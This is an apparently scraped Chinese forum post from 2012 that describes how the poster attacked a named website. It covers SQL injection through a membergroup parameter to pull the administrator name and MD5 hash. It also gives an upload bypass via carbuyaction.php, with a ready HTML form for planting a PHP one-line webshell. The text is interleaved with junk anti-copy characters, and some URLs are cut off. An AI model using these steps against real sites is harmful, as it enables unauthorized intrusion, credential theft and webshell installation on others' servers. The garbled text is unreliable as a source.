①注入漏洞。
( A& [- S1 i. A8 o% h3 C" K这站 http://www.political-security.com/; [$ R7 v% f6 u+ w L
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
6 l" }/ k8 h' F2 \www.political-security.com/data/mysql_error_trace.inc 爆后台3 H: Y# _$ `3 B0 u' U7 ]
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。8 r% S' n! {( G; W: ?0 N
然后写上语句
; C! k$ M5 R# r& s) v- ^$ H查看管理员帐号
+ m0 f7 [4 D% Thttp://www.political-security.co ... &membergroup=@`
, T7 e: e' Y) C0 J+ ?2 q) ?" n& O; X
admin + Y' [9 [ I4 l" J
: k5 x' G5 B2 `' Z查看管理员密码
6 b \1 x' y. q$ o0 W http://www.political-security.co ... &membergroup=@`
% G9 k) d Y/ ^: A( C7 a2 ?, i" }8 D/ C5 R- c: x- Q$ a/ I9 y
8d29b1ef9f8c5a5af429
& x7 Z2 T( [' }. @0 U! [/ _( [( P$ z! E3 y3 w' X
查看管理员密码7 O) ?) t2 {8 H
- }2 s3 u) K% Z) [: }
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
0 N, ~( J$ c7 m9 d- z1 E
2 X$ N& \( m! U4 X+ F: V8d2
# e( K9 }/ L n8 T3 M+ C/ v9b1ef9f8c5a5af421 v7 N; ]7 Y1 _5 `
98 w6 m$ r* J# z4 E
& W, q: d2 `+ ?) p, ]
cmd5没解出来 只好测试第二个方法
& o; Q0 D& [( x0 r, u" c' N+ f6 B5 O7 _9 V; N w
9 H4 M8 k$ Y Z+ z- W②上传漏洞:
/ x, N1 Y, \( [' a9 G
- N( p0 L6 X8 T/ S" P只要登陆会员中心,然后访问页面链接* n. u) R; ~# s- @& S1 ]
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
- ^3 B5 n" A8 e4 G% ~, {2 R
# i/ T; L- c0 |1 {6 m$ G$ Q如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
4 G$ T& |( e+ d5 h# Z9 e6 u# H6 k- b# j) c; T
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
! ~! X4 t* Q( ], d" s. P8 V
* G3 v; U+ | \) y! e! [* n<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
& J- t+ x* _4 k& M/ Y# v或者
" _" x; R! l! C* j, x( I6 O0 D即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对